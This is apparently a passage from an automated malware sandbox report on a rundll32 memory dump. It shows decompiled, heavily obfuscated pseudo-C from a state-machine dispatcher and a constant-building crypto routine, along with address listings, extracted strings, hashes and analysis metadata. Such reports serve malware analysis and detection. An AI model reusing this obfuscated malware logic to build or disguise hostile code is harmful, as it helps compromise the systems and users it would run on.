								if(_t1096 == 0x167196bc) {
									_t1020 = E001AA4E1();
									asm("sbb ecx, ecx");
									_t1117 =  ~_t1020 & 0x05d9a0ad;
									__eflags = _t1117;
									L44:
									_t1096 = _t1117 + 0xb67dcbf;
									continue;
								}
								__eflags = _t1096 - 0x168f72b9;
								if(_t1096 != 0x168f72b9) {
									break;
								}
								_t1188 = _v132;
								_t1020 = E001AE380(_v436, _t1188, _v524);
								_t1096 = 0x375880e8;
								continue;
							}
							if(_t1236 == 0) {
								_t1020 = E001A3C28();
								goto L112;
							}
							_t1237 = _t1096 - 0x9773d10;
							if(_t1237 > 0) {
								__eflags = _t1096 - 0xa272b1b;
								if(__eflags == 0) {
									_v96 = 0x1346150;
									_t1096 = 0xe35770d;
									continue;
								}
								__eflags = _t1096 - 0xb67dcbf;
								if(_t1096 == 0xb67dcbf) {
									E001A367A();
									_t1223 = 0x2f9ed7a0;
									_t1020 = E001AEE50();
									_t1193 = _t1020;
									_t1094 = _t1188;
									goto L34;
								}
								__eflags = _t1096 - 0xe35770d;
								if(__eflags == 0) {
									_v92 = 0xfa0;
									_t1096 = 0x27f3eb9e;
									continue;
								}
								__eflags = _t1096 - 0xfc32371;
								if(_t1096 != 0xfc32371) {
									break;
								}
								_t1020 = E001A6A6F(_v540,  &_v68);
								__eflags = _t1020;
								if(__eflags == 0) {
									L20:
									_t1096 = 0x3410c786;
									continue;
								}
								_t1188 = _v168;
								_v112 =  &_v68;
								_t1020 = E001B8D7D(_v532, _t1188,  &_v68);
								_v108 = _t1020;
								_t1096 = 0x268db8a6;
								continue;
							}
							if(_t1237 == 0) {
								_t1020 = E001B4F60();
								_v104 = _t1020;
								_t1096 = 0x390dda0;
								continue;
							}
							if(_t1096 == 0x38fcb7) {
								_t1020 = _t1193 | _t1094;
								__eflags = _t1020;
								if(__eflags != 0) {
									_t1033 = E001B820A(0x5dc, _t1188, __eflags, 0x1f4);
									_t1227 = _t1227 - 0xc + 0x10;
									_t1020 = E001A5D38(__eflags, _t1033, _t1033);
									__eflags = _t1020;
									if(__eflags == 0) {
										_t1020 = E001AEE50();
										__eflags = _t1188 - _t1094;
										if(__eflags < 0) {
											L24:
											_t1096 = 0x38fcb7;
											break;
										}
										if(__eflags > 0) {
											goto L18;
										}
										__eflags = _t1020 - _t1193;
										if(_t1020 >= _t1193) {
											goto L18;
										}
										goto L24;
									}
									goto L20;
								}
								L18:
								_t1096 = _t1223;
								break;
							}
							if(_t1096 == 0x390dda0) {
								_t1020 = E001B7713();
								_v100 = _t1020;
								_t1096 = 0xa272b1b;
								continue;
							}
							if(_t1096 == 0x4363fef) {
								_t1020 = E001AC8BB();
								_t1096 = 0x1882a564;
								continue;
							}
							if(_t1096 == 0x5c80354) {
								_t1020 = E001B3F3E();
								_t1096 = 0x30d775bc;
								continue;
							}
							if(_t1096 != 0x75b7379) {
								break;
							} else {
								_t1020 = E001B4B48();
								_t1096 = 0x38750a8d;
								continue;
							}
							L61:
							__eflags = _t1096 - 0x2f9ed7a0;
							if(__eflags > 0) {
								__eflags = _t1096 - 0x3753589a;
								if(__eflags > 0) {
									__eflags = _t1096 - 0x375880e8;
									if(_t1096 == 0x375880e8) {
										E001AE380(_v416, _v140, _v296);
										_t1096 = 0x206488c6;
										break;
									}
									__eflags = _t1096 - 0x386459ce;
									if(_t1096 == 0x386459ce) {
										_push( &_v140);
										_t1188 = _v472;
										_t1010 = E001B2DE1( &_v132, _t1188, _t1096, _v220);
										_t1229 = _t1227 + 0xc;
										__eflags = _t1010;
										if(__eflags == 0) {
											E001AD060();
											_t1223 = 0x27f3eb9e;
											_t1019 = E001B820A(0x1f40, _t1188, __eflags, 0xfa0);
											_t1227 = _t1229 - 0xc + 0x10;
											_t1020 = E001AEE50();
											_t1094 = _t1188;
											_t1193 = _t1020 + _t1019;
											_t1096 = 0x375880e8;
											asm("adc ebx, 0x0");
										} else {
											_t1223 = 0x27f3eb9e;
											_t1091 = E001B820A(0xe09c0, _t1188, __eflags, 0xdbba0);
											_t1227 = _t1229 - 0xc + 0x10;
											_t1020 = E001AEE50();
											_t1094 = _t1188;
											_t1193 = _t1020 + _t1091;
											_t1096 = 0x181af132;
											asm("adc ebx, 0x0");
										}
										while(1) {
											L1:
											goto L2;
										}
									}
									__eflags = _t1096 - 0x386a45e7;
									if(_t1096 == 0x386a45e7) {
										_t1020 = E001A77F0();
										__eflags = _t1020;
										if(__eflags == 0) {
											goto L112;
										}
										_t1096 = 0x25f1bc45;
										continue;
									}
									__eflags = _t1096 - 0x38750a8d;
									if(_t1096 != 0x38750a8d) {
										break;
									}
									_t1020 = E001AB7C2();
									_t1096 = 0x2df85915;
									continue;
								}
								if(__eflags == 0) {
									_t1096 = 0x1de2d3e5;
									continue;
								}
								__eflags = _t1096 - 0x30446cda;
								if(_t1096 == 0x30446cda) {
									_t1188 =  &_v140;
									_t1020 = E001AF3B5(_v336, _t1188, _v236,  &_v112, _v488);
									_t1227 = _t1227 + 0xc;
									asm("sbb ecx, ecx");
									_t1096 = ( ~_t1020 & 0x17ffd108) + 0x206488c6;
									continue;
								}
								__eflags = _t1096 - 0x30d775bc;
								if(_t1096 == 0x30d775bc) {
									_t1020 = E001AD760();
									__eflags = _t1020;
									if(_t1020 == 0) {
										goto L112;
									}
									_t1020 = E001B8BDA(_v344);
									_t1096 = 0x116d33a8;
									continue;
								}
								__eflags = _t1096 - 0x3410c786;
								if(_t1096 == 0x3410c786) {
									_t1020 = E001A75A0(_t1096);
									goto L112;
								}
								__eflags = _t1096 - 0x361af6e7;
								if(__eflags != 0) {
									break;
								}
								_t1223 = 0xfc32371;
								_t1067 = E001B820A(0x2710, _t1188, __eflags, 0x1388);
								_t1227 = _t1227 - 0xc + 0x10;
								_t1020 = E001AEE50();
								_t1094 = _t1188;
								_t1193 = _t1020 + _t1067;
								_t1096 = 0x38fcb7;
								asm("adc ebx, 0x0");
								goto L1;
							}
							if(__eflags == 0) {
								_t1096 = 0x1c904052;
								continue;
							}
							__eflags = _t1096 - 0x2614d4c0;
							if(__eflags > 0) {
								__eflags = _t1096 - 0x268db8a6;
								if(__eflags == 0) {
									_t1020 = E001B73BC();
									_v72 = _t1020;
									_t1096 = 0x9773d10;
									continue;
								}
								__eflags = _t1096 - 0x26efdeea;
								if(_t1096 == 0x26efdeea) {
									_t1188 =  &_v80;
									_t1020 = E001B591C(_v392, _t1188, _v512);
									_t1096 = 0x30446cda;
									continue;
								}
								__eflags = _t1096 - 0x27f3eb9e;
								if(_t1096 == 0x27f3eb9e) {
									_t1188 = _v520;
									_t1020 = E001B6E50(_v244, _t1188,  &_v88, _v252);
									_t1096 = 0x26efdeea;
									continue;
								}
								__eflags = _t1096 - 0x2df85915;
								if(_t1096 != 0x2df85915) {
									break;
								}
								_t1020 = E001BB59B();
								_t1096 = 0x386a45e7;
								continue;
							}
							if(__eflags == 0) {
								__eflags = E001AEF04();
								if(__eflags == 0) {
									_t1020 = E001AF3A9();
									asm("sbb ecx, ecx");
									_t1096 = ( ~_t1020 & 0xcee668ec) + 0x38750a8d;
									continue;
								}
								_t1020 = E001AF3A9();
								asm("sbb ecx, ecx");
								_t1117 =  ~_t1020 & 0x0b09b9fd;
								goto L44;
							}
							__eflags = _t1096 - 0x1fe87560;
							if(_t1096 == 0x1fe87560) {
								_t1020 = E001A81BB();
								_t1096 = 0x11417d6c;
								continue;
							}
							__eflags = _t1096 - 0x204c3e9e;
							if(_t1096 == 0x204c3e9e) {
								_t1020 = E001A415F();
								_t1096 = 0x1fe87560;
								continue;
							}
							__eflags = _t1096 - 0x206488c6;
							if(_t1096 == 0x206488c6) {
								_t1188 = _v80;
								_t1020 = E001AE380(_v180, _t1188, _v208);
								_t1096 = 0x1dcb1bf4;
								continue;
							}
							__eflags = _t1096 - 0x25f1bc45;
							if(_t1096 != 0x25f1bc45) {
								break;
							}
							E001A628A();
							_t1020 = E001AF3A9();
							asm("sbb ecx, ecx");
							_t1096 = ( ~_t1020 & 0x0063c93e) + 0x1fe87560;
						}
						__eflags = _t1096 - 0x2d9f3e5e;
					} while (__eflags != 0);
					goto L112;
				}
			}

0x001a8b1c
0x001a8b26
0x001a8b30
0x001a8b35
0x001a8b3a
0x001a8b42
0x001a8b4a
0x001a8b52
0x001a8b5d
0x001a8b68
0x001a8b73
0x001a8b7e
0x001a8b89
0x001a8b94
0x001a8b9c
0x001a8ba7
0x001a8bb2
0x001a8bba
0x001a8bc5
0x001a8bd0
0x001a8be4
0x001a8be7
0x001a8bf6
0x001a8bfd
0x001a8c08
0x001a8c13
0x001a8c1e
0x001a8c29
0x001a8c34
0x001a8c3f
0x001a8c4a
0x001a8c52
0x001a8c5d
0x001a8c68
0x001a8c70
0x001a8c7b
0x001a8c86
0x001a8c8e
0x001a8c96
0x001a8c9b
0x001a8ca3
0x001a8cab
0x001a8cbe
0x001a8cc5
0x001a8cd0
0x001a8cdb
0x001a8cee
0x001a8cf5
0x001a8d00
0x001a8d13
0x001a8d1a
0x001a8d22
0x001a8d2d
0x001a8d35
0x001a8d3d
0x001a8d42
0x001a8d4a
0x001a8d52
0x001a8d5d
0x001a8d68
0x001a8d73
0x001a8d7e
0x001a8d89
0x001a8d94
0x001a8d9f
0x001a8db2
0x001a8db9
0x001a8dc4
0x001a8dda
0x001a8ddf
0x001a8de8
0x001a8df3
0x001a8dfe
0x001a8e10
0x001a8e15
0x001a8e1e
0x001a8e29
0x001a8e34
0x001a8e3c
0x001a8e40
0x001a8e45
0x001a8e4d
0x001a8e55
0x001a8e68
0x001a8e6b
0x001a8e72
0x001a8e7d
0x001a8e88
0x001a8e93
0x001a8e9e
0x001a8eab
0x001a8eaf
0x001a8eb7
0x001a8ebf
0x001a8eca
0x001a8ed5
0x001a8edd
0x001a8ee8
0x001a8ef0
0x001a8ef8
0x001a8f00
0x001a8f05
0x001a8f0d
0x001a8f18
0x001a8f23
0x001a8f2b
0x001a8f36
0x001a8f41
0x001a8f49
0x001a8f54
0x001a8f6a
0x001a8f71
0x001a8f7c
0x001a8f8f
0x001a8f90
0x001a8f97
0x001a8fa2
0x001a8faa
0x001a8fb5
0x001a8fbd
0x001a8fcb
0x001a8fcf
0x001a8fd4
0x001a8fdc
0x001a8fe7
0x001a8ff2
0x001a8ffd
0x001a9008
0x001a9013
0x001a901b
0x001a9026
0x001a9037
0x001a903a
0x001a903b
0x001a903f
0x001a904f
0x001a9053
0x001a905b
0x001a9063
0x001a9072
0x001a907b
0x001a907f
0x001a9087
0x001a9092
0x001a909d
0x001a90a5
0x001a90b0
0x001a90b8
0x001a90bd
0x001a90c2
0x001a90c7
0x001a90cf
0x001a90e5
0x001a90f3
0x001a90f6
0x001a90fd
0x001a9108
0x001a9113
0x001a911e
0x001a9126
0x001a9131
0x001a913c
0x001a9144
0x001a914c
0x001a9157
0x001a916a
0x001a9171
0x001a917c
0x001a9187
0x001a918f
0x001a9194
0x001a91a1
0x001a91a5
0x001a91ad
0x001a91b8
0x001a91c0
0x001a91cb
0x001a91d3
0x001a91de
0x001a91e6
0x001a91ee
0x001a91f6
0x001a91fe
0x001a9206
0x001a9213
0x001a9217
0x001a921f
0x001a9227
0x001a922f
0x001a923a
0x001a9245
0x001a9250
0x001a9258
0x001a9260
0x001a9268
0x001a9272
0x001a927a
0x001a9282
0x001a928a
0x001a928f
0x001a9297
0x001a929f
0x001a92aa
0x001a92b5
0x001a92c0
0x001a92cb
0x001a92d6
0x001a92eb
0x001a92ee
0x001a92f5
0x001a9300
0x001a930b
0x001a9313
0x001a931e
0x001a9329
0x001a9331
0x001a933c
0x001a9349
0x001a934d
0x001a9352
0x001a935a
0x001a9362
0x001a936d
0x001a9378
0x001a9383
0x001a938e
0x001a9396
0x001a93a1
0x001a93ac
0x001a93b4
0x001a93bc
0x001a93c4
0x001a93cc
0x001a93d4
0x001a93df
0x001a93ea
0x001a93f5
0x001a9400
0x001a940b
0x001a9416
0x001a9421
0x001a942e
0x001a9432
0x001a943a
0x001a9442
0x001a944a
0x001a9452
0x001a9462
0x001a946a
0x001a946f
0x001a9473
0x001a947b
0x001a9486
0x001a9491
0x001a949c
0x001a94a4
0x001a94a9
0x001a94b1
0x001a94b6
0x001a94be
0x001a94c9
0x001a94da
0x001a94df
0x001a94e8
0x001a94f3
0x001a94fe
0x001a9509
0x001a9514
0x001a951f
0x001a952a
0x001a9535
0x001a9547
0x001a954c
0x001a9555
0x001a9560
0x001a956b
0x001a9576
0x001a9581
0x001a958c
0x001a9597
0x001a95a6
0x001a95ab
0x001a95b4
0x001a95bc
0x001a95c7
0x001a95d2
0x001a95dd
0x001a95e8
0x001a95f3
0x001a95fb
0x001a960b
0x001a960e
0x001a9615
0x001a9620
0x001a962b
0x001a9636
0x001a9641
0x001a964c
0x001a9654
0x001a965f
0x001a9675
0x001a967c
0x001a9687
0x001a968f
0x001a969a
0x001a96a5
0x001a96b7
0x001a96bc
0x001a96c5
0x001a96d0
0x001a96db
0x001a96e3
0x001a96ee
0x001a96f9
0x001a9705
0x001a970a
0x001a970e
0x001a971c
0x001a9721
0x001a9725
0x001a972d
0x001a973d
0x001a9743
0x001a9748
0x001a9750
0x001a9758
0x001a9763
0x001a976e
0x001a9779
0x001a9784
0x001a9791
0x001a9794
0x001a97a0
0x001a97a4
0x001a97ac
0x001a97b4
0x001a97c1
0x001a97c2
0x001a97cb
0x001a97cf
0x001a97d4
0x001a97dc
0x001a97ef
0x001a97f6
0x001a9801
0x001a980c
0x001a9817
0x001a9822
0x001a982d
0x001a9838
0x001a9843
0x001a984e
0x001a9859
0x001a9864
0x001a986c
0x001a9877
0x001a9882
0x001a988d
0x001a9898
0x001a98ac
0x001a98b3
0x001a98be
0x001a98c9
0x001a98d4
0x001a98dc
0x001a98e4
0x001a98ec
0x001a98f4
0x001a98fc
0x001a990f
0x001a991e
0x001a9925
0x001a9930
0x001a993b
0x001a9943
0x001a994e
0x001a9959
0x001a9964
0x001a996f
0x001a997a
0x001a9991
0x001a9992
0x001a9999
0x001a99a0
0x001a99a7
0x001a99b2
0x001a99bd
0x001a99c5
0x001a99d0
0x001a99db
0x001a99e6
0x001a99f1
0x001a99fc
0x001a9a07
0x001a9a12
0x001a9a1d
0x001a9a30
0x001a9a37
0x001a9a3e
0x001a9a49
0x001a9a5c
0x001a9a63
0x001a9a6b
0x001a9a76
0x001a9a81
0x001a9a8c
0x001a9a97
0x001a9aa2
0x001a9aad
0x001a9ab8
0x001a9ac0
0x001a9acb
0x001a9ad3
0x001a9adb
0x001a9ae3
0x001a9aeb
0x001a9af3
0x001a9afe
0x001a9b09
0x001a9b14
0x001a9b1f
0x001a9b2a
0x001a9b35
0x001a9b40
0x001a9b48
0x001a9b53
0x001a9b5e
0x001a9b71
0x001a9b78
0x001a9b89
0x001a9b90
0x001a9b9b
0x001a9ba6
0x001a9bb1
0x001a9bbc
0x001a9bc7
0x001a9bc7
0x001a9bcc
0x001a9bcc
0x001a9bcc
0x001a9bcc
0x001a9bd2
0x00000000
0x00000000
0x001a9bd8
0x001a9bd8
0x001aa04a
0x001aa04f
0x001aa051
0x001aa4d9
0x001aa4e0
0x001aa4e0
0x001aa057
0x001a9bcc
0x001a9bcc
0x001a9bcc
0x001a9bd2
0x00000000
0x00000000
0x00000000
0x001a9bd2
0x00000000
0x001a9bcc
0x001a9bde
0x001a9be0
0x001a9e13
0x001a9e19
0x001a9f1e
0x001a9f24
0x001aa003
0x001aa011
0x001aa016
0x001aa019
0x001aa01b
0x001aa01d
0x001aa020
0x001aa025
0x001aa02e
0x001aa035
0x001aa035
0x001aa03c
0x001aa03c
0x00000000
0x001aa03c
0x001a9f2a
0x001a9f30
0x001a9fe3
0x00000000
0x001a9fe3
0x001a9f36
0x001a9f3c
0x001a9f6a
0x001a9f8f
0x001a9fb6
0x001a9fc6
0x001a9fd1
0x001a9fd6
0x001a9fd9
0x00000000
0x001a9fd9
0x001a9f3e
0x001a9f44
0x00000000
0x00000000
0x001a9f51
0x001a9f5f
0x001a9df4
0x001a9df4
0x00000000
0x001a9df4
0x001a9e1f
0x001a9ed0
0x001a9edb
0x001a9ee0
0x001a9ee3
0x001a9ee5
0x00000000
0x00000000
0x001a9ef6
0x001a9efb
0x001a9f03
0x001a9f08
0x001a9f0e
0x001a9f16
0x001a9f16
0x00000000
0x001a9f08
0x001a9e25
0x001a9e2b
0x001aa4c6
0x00000000
0x001aa4c6
0x001a9e31
0x001a9e37
0x001a9ea0
0x001a9ea9
0x001a9eb1
0x00000000
0x001a9eb1
0x001a9e39
0x001a9e3f
0x001a9e7d
0x001a9e86
0x001a9e88
0x001a9e88
0x001a9e8e
0x001a9e8e
0x00000000
0x001a9e8e
0x001a9e41
0x001a9e47
0x00000000
0x00000000
0x001a9e51
0x001a9e5f
0x001a9e65
0x00000000
0x001a9e65
0x001a9be6
0x001aa4b8
0x00000000
0x001aa4b8
0x001a9bec
0x001a9bf2
0x001a9d46
0x001a9d4c
0x001a9dfe
0x001a9e09
0x00000000
0x001a9e09
0x001a9d52
0x001a9d58
0x001a9dda
0x001a9de6
0x001a9deb
0x001a9df0
0x001a9df2
0x00000000
0x001a9df2
0x001a9d5a
0x001a9d60
0x001a9dc1
0x001a9dcc
0x00000000
0x001a9dcc
0x001a9d62
0x001a9d68
0x00000000
0x00000000
0x001a9d81
0x001a9d88
0x001a9d8a
0x001a9cfb
0x001a9cfb
0x00000000
0x001a9cfb
0x001a9d90
0x001a9da3
0x001a9daa
0x001a9db0
0x001a9db7
0x00000000
0x001a9db7
0x001a9bf8
0x001a9d30
0x001a9d35
0x001a9d3c
0x00000000
0x001a9d3c
0x001a9c04
0x001a9c9e
0x001a9c9e
0x001a9ca0
0x001a9cd2
0x001a9cd9
0x001a9cf0
0x001a9cf7
0x001a9cf9
0x001a9d0c
0x001a9d11
0x001a9d13
0x001a9d1b
0x001a9d1b
0x00000000
0x001a9d1b
0x001a9d15
0x00000000
0x00000000
0x001a9d17
0x001a9d19
0x00000000
0x00000000
0x00000000
0x001a9d19
0x00000000
0x001a9cf9
0x001a9ca2
0x001a9ca2
0x00000000
0x001a9ca2
0x001a9c10
0x001a9c86
0x001a9c8b
0x001a9c92
0x00000000
0x001a9c92
0x001a9c18
0x001a9c69
0x001a9c6e
0x00000000
0x001a9c6e
0x001a9c20
0x001a9c4f
0x001a9c54
0x00000000
0x001a9c54
0x001a9c28
0x00000000
0x001a9c2e
0x001a9c35
0x001a9c3a
0x00000000
0x001a9c3a
0x001aa061
0x001aa061
0x001aa067
0x001aa238
0x001aa23e
0x001aa33e
0x001aa344
0x001aa491
0x001aa497
0x00000000
0x001aa497
0x001aa34a
0x001aa350
0x001aa39e
0x001aa3a6
0x001aa3b2
0x001aa3b7
0x001aa3ba
0x001aa3bc
0x001aa420
0x001aa442
0x001aa45a
0x001aa45f
0x001aa464
0x001aa46b
0x001aa46d
0x001aa46f
0x001aa474
0x001aa3be
0x001aa3d8
0x001aa3f0
0x001aa3f5
0x001aa3fa
0x001aa401
0x001aa403
0x001aa405
0x001aa40a
0x001aa40a
0x001a9bc7
0x001a9bc7
0x00000000
0x001a9bc7
0x001a9bc7
0x001aa352
0x001aa358
0x001aa380
0x001aa385
0x001aa387
0x00000000
0x00000000
0x001aa38d
0x00000000
0x001aa38d
0x001aa35a
0x001aa360
0x00000000
0x00000000
0x001aa36a
0x001aa36f
0x00000000
0x001aa36f
0x001aa244
0x001aa334
0x00000000
0x001aa334
0x001aa24a
0x001aa250
0x001aa30e
0x001aa315
0x001aa31a
0x001aa321
0x001aa329
0x00000000
0x001aa329
0x001aa256
0x001aa25c
0x001aa2d1
0x001aa2d6
0x001aa2d8
0x00000000
0x00000000
0x001aa2e5
0x001aa2ea
0x00000000
0x001aa2ea
0x001aa25e
0x001aa264
0x001aa4d4
0x00000000
0x001aa4d4
0x001aa26a
0x001aa270
0x00000000
0x00000000
0x001aa290
0x001aa2a8
0x001aa2ad
0x001aa2b2
0x001aa2b9
0x001aa2bb
0x001aa2bd
0x001aa2c2
0x00000000
0x001aa2c2
0x001aa06d
0x001aa22e
0x00000000
0x001aa22e
0x001aa073
0x001aa079
0x001aa182
0x001aa188
0x001aa218
0x001aa21d
0x001aa224
0x00000000
0x001aa224
0x001aa18e
0x001aa194
0x001aa1fd
0x001aa204
0x001aa20a
0x00000000
0x001aa20a
0x001aa196
0x001aa19c
0x001aa1ce
0x001aa1e1
0x001aa1e8
0x00000000
0x001aa1e8
0x001aa19e
0x001aa1a4
0x00000000
0x00000000
0x001aa1b8
0x001aa1bd
0x00000000
0x001aa1bd
0x001aa07f
0x001aa141
0x001aa143
0x001aa166
0x001aa16f
0x001aa177
0x00000000
0x001aa177
0x001aa14c
0x001aa155
0x001aa157
0x00000000
0x001aa157
0x001aa085
0x001aa08b
0x001aa126
0x001aa12b
0x00000000
0x001aa12b
0x001aa091
0x001aa097
0x001aa10c
0x001aa111
0x00000000
0x001aa111
0x001aa099
0x001aa09f
0x001aa0e7
0x001aa0f5
0x001aa0fb
0x00000000
0x001aa0fb
0x001aa0a1
0x001aa0a7
0x00000000
0x00000000
0x001aa0bb
0x001aa0c4
0x001aa0cd
0x001aa0d5
0x001aa0d5
0x001aa49c
0x001aa49c
0x00000000
0x001aa4a8

Strings

8B, xrefs: 001A96C5
5, xrefs: 001A91F6
7], xrefs: 001A996F
]Z, xrefs: 001A940B
yh, xrefs: 001A97A4
J, xrefs: 001A8FFD
w\, xrefs: 001A9157
io, xrefs: 001A8D94
Ej8, xrefs: 001AA1BD
5, xrefs: 001A9AC0
j, xrefs: 001A8DC4
*N, xrefs: 001A951F
L], xrefs: 001A9331
Ej8, xrefs: 001AA352
|^, xrefs: 001A9473
zR, xrefs: 001A9B9B
hLA, xrefs: 001A9194
H(, xrefs: 001A93A1
3T, xrefs: 001A9A07
qe, xrefs: 001A972D
), xrefs: 001A9B14
k, xrefs: 001A9930
Ip, xrefs: 001A92CB
6(, xrefs: 001A8FAA
,9, xrefs: 001A9AFE
?^, xrefs: 001A8FD4
fo, xrefs: 001A9509
1B, xrefs: 001A8E55
t, xrefs: 001A8F71
df, xrefs: 001A9654

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: k$)$*N$,9$1B$3T$5$6($7]$8B$?^$Ip$L]$]Z$df$fo$hLA$io$j$qe$t$w\$yh$zR$|^$5$Ej8$Ej8$H($J
API String ID: 0-2632039745
Opcode ID: 0d45e1a85de10c2851c089422ada8b2c58e15bb708a738fa0b4c18bbe0c08443
Instruction ID: a090cbb1bc6636532d421d1c22792105a0ed8d9dd71b166b185f35c063f0a281
Opcode Fuzzy Hash: 0d45e1a85de10c2851c089422ada8b2c58e15bb708a738fa0b4c18bbe0c08443
Instruction Fuzzy Hash: A7C202755083818BE378DF25C48ABDFBBE1BBD5314F10891DE58A862A0DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001BA59F, Relevance: 34.4, Strings: 27, Instructions: 686
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E001BA59F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int _a32, signed int _a36, intOrPtr _a40) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _t755;
				signed int _t760;
				signed int _t770;
				intOrPtr _t775;
				void* _t783;
				signed int _t784;
				signed int _t790;
				signed int _t791;
				signed int _t793;
				signed int _t794;
				signed int _t796;
				signed int _t810;
				void* _t860;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				void* _t905;
				void* _t907;
				void* _t912;

				_t794 = _a32;
				_push(_a40);
				_push(_a36 & 0x0000ffff);
				_push(_t794);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_a36 & 0x0000ffff);
				_t796 = 0;
				_t907 =  &_v308 + 0x30;
				_v12 = _v12 & 0;
				_v160 = 0x1339;
				_t905 = 0;
				_v160 = _v160 << 0xd;
				_t899 = 0x31bced90;
				_v160 = _v160 + 0xffff3e32;
				_v160 = _v160 ^ 0x02665e32;
				_v112 = 0xb1d8;
				_v112 = _v112 + 0x5d36;
				_t877 = 0x7d;
				_v16 = _v16 & 0;
				_v112 = _v112 * 0x17;
				_v112 = _v112 ^ 0x00185a51;
				_v288 = 0x8171;
				_v288 = _v288 + 0xffff45b3;
				_v308 = 0;
				_v288 = _v288 * 0x4b;
				_v288 = _v288 + 0xffff39e7;
				_v288 = _v288 ^ 0xffee91bb;
				_v96 = 0xdb68;
				_v96 = _v96 / _t877;
				_v96 = _v96 ^ 0x000081c1;
				_v20 = 0x4e3f;
				_t878 = 0x59;
				_v20 = _v20 * 0x5f;
				_v20 = _v20 ^ 0x001d4961;
				_v148 = 0x672f;
				_v148 = _v148 + 0x14e8;
				_v148 = _v148 | 0xbd4cf119;
				_v148 = _v148 ^ 0xbd0cfd1f;
				_v188 = 0x7fe0;
				_v188 = _v188 + 0xffff506e;
				_v188 = _v188 + 0xffff4de9;
				_v188 = _v188 ^ 0xfffb1e37;
				_v132 = 0x8ed7;
				_v132 = _v132 + 0xffff4a9f;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0xfbfb2ec0;
				_v196 = 0x1370;
				_v196 = _v196 / _t878;
				_v196 = _v196 >> 6;
				_v196 = _v196 ^ 0x00080000;
				_v280 = 0x50b7;
				_v280 = _v280 ^ 0x5f2a23ad;
				_v280 = _v280 | 0x4bde55de;
				_v280 = _v280 + 0xffff78ad;
				_v280 = _v280 ^ 0x5ffdf28b;
				_v256 = 0xefa1;
				_v256 = _v256 << 7;
				_v256 = _v256 << 0xc;
				_t879 = 0x27;
				_v256 = _v256 * 0x49;
				_v256 = _v256 ^ 0xa7480100;
				_v156 = 0x3e86;
				_v156 = _v156 ^ 0xbe822b5f;
				_v156 = _v156 + 0xffffe6c1;
				_v156 = _v156 ^ 0x3e81fc9a;
				_v100 = 0xe928;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x000003a4;
				_v208 = 0xd18d;
				_v208 = _v208 + 0x5fab;
				_v208 = _v208 / _t879;
				_v208 = _v208 ^ 0x000007d0;
				_v184 = 0x2b99;
				_v184 = _v184 >> 6;
				_v184 = _v184 ^ 0x80e9db2e;
				_v184 = _v184 ^ 0x80e9cafc;
				_v192 = 0xd0e;
				_t880 = 0x4a;
				_v192 = _v192 / _t880;
				_v192 = _v192 | 0x2cf2bc77;
				_v192 = _v192 ^ 0x2cf28012;
				_v224 = 0x39c9;
				_v224 = _v224 ^ 0x251f87bc;
				_v224 = _v224 + 0x9795;
				_v224 = _v224 ^ 0x25203609;
				_v260 = 0x3acc;
				_v260 = _v260 << 0xf;
				_t881 = 0x35;
				_v260 = _v260 * 0xe;
				_v260 = _v260 | 0x21829eaa;
				_v260 = _v260 ^ 0xbb96ce1d;
				_v168 = 0x9ad7;
				_v168 = _v168 * 0xc;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x0000a77d;
				_v252 = 0x66af;
				_v252 = _v252 ^ 0xd66deb92;
				_v252 = _v252 + 0xffff5d10;
				_v252 = _v252 ^ 0xb6fc5674;
				_v252 = _v252 ^ 0x6090c17b;
				_v176 = 0xfca7;
				_v176 = _v176 / _t881;
				_v176 = _v176 >> 0xf;
				_v176 = _v176 ^ 0x00007a63;
				_v152 = 0xa919;
				_t882 = 0x2d;
				_v152 = _v152 * 0x59;
				_v152 = _v152 / _t882;
				_v152 = _v152 ^ 0x00014165;
				_v244 = 0x5886;
				_t883 = 0x75;
				_v244 = _v244 / _t883;
